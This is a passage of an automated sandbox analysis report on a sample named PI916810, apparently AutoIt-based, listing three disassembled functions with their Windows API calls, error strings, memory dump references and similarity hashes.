                                                                                                                                                                            Function 004C51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassName_wcscmp
                                                                                                                                                                            • String ID: #32770
                                                                                                                                                                            • API String ID: 2292705959-463685578
                                                                                                                                                                            • Opcode ID: 3d3ce4d54a740eba2d3eea3129a20629638e26d16a27be9704b91fcd836c6701
                                                                                                                                                                            • Instruction ID: 5a87869e863544bce8e06ab666466261b0b21f395b67cadd354c8e91729bccbb
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d3ce4d54a740eba2d3eea3129a20629638e26d16a27be9704b91fcd836c6701
                                                                                                                                                                            • Instruction Fuzzy Hash: 4EE02B3260022C17E3209A959C45F97F7ACEB45721F00006BF910D3041E5709A458BD4
                                                                                                                                                                            Function 004B81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004B81CA
                                                                                                                                                                              • Part of subcall function 00483598: _doexit.LIBCMT ref: 004835A2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message_doexit
                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                                                                            • Opcode ID: f1364bb141b1146bbb9146310ed80522f98fbed6264dbfe3f7fb8bfbe7598b4b
                                                                                                                                                                            • Instruction ID: 92d95482120e50b3d1a304077acd59d59e71b85af2eaa160f7d3f306d8db6765
                                                                                                                                                                            • Opcode Fuzzy Hash: f1364bb141b1146bbb9146310ed80522f98fbed6264dbfe3f7fb8bfbe7598b4b
                                                                                                                                                                            • Instruction Fuzzy Hash: E6D0123228536832D61532A96C06FCA7A4C4B05F5AF10442BBB08555D389D9558242AD
                                                                                                                                                                            Function 0049B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0049B564: _memset.LIBCMT ref: 0049B571
                                                                                                                                                                              • Part of subcall function 00480B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0049B540,?,?,?,0046100A), ref: 00480B89
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0046100A), ref: 0049B544
                                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0046100A), ref: 0049B553
                                                                                                                                                                            Strings
                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0049B54E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                            • API String ID: 3158253471-631824599
                                                                                                                                                                            • Opcode ID: 5925ef4f2f592ef5af013969b7925f8435ba2e3a9fd234fcc5193e19d09f65f9
                                                                                                                                                                            • Instruction ID: 3dea9161e01c14cb6e9cb6023857c25993fc3ef4351ef4a4051878393d8eeffd
                                                                                                                                                                            • Opcode Fuzzy Hash: 5925ef4f2f592ef5af013969b7925f8435ba2e3a9fd234fcc5193e19d09f65f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 19E06D70200350CBD720DF29E5083567FE4EF00768F05893EE446C6391E7B8E408CBA5